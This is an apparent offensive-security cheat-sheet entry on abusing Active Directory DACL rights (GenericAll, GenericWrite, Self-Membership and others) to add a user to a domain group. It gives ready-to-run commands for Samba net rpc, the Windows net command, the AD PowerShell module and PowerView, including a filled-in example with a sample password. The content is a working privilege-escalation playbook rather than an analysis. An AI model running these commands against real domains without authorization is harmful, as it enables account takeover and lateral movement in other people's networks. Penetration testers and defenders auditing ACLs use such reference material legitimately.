ADDMEMBER

PRIMARY CATEGORY → DACL ABUSE

An operator can abuse this DACL when the controlled user account has GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership over the target group

---

Abuse - UNIX-like

Net RPC (Samba Suite)

Net RPC

net rpc group addmem '<GROUP>' '<USER>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'

e.g.

User A leverages GenericWrite over Group A to add User B to Group A

net rpc group addmem 'Group A' 'userB' 'domain.local/userA%password1234$!' -S 'dc.domain.local'

---

Abuse - Windows

Net Command

Net

net group /domain /add '<GROUP>' '<USER>'

AD Powershell Module

AD PS Module

Add-ADGroupMember -Identity '<GROUP>' -Members '<USER>'

Powerview

Powerview.ps1

Add-DomainGroupMember

$pass = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'

$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>,', $pass)

Add-DomainGroupMember -Credential $cred -Identity '<GROUP>' -Members '<USER>' -Verbose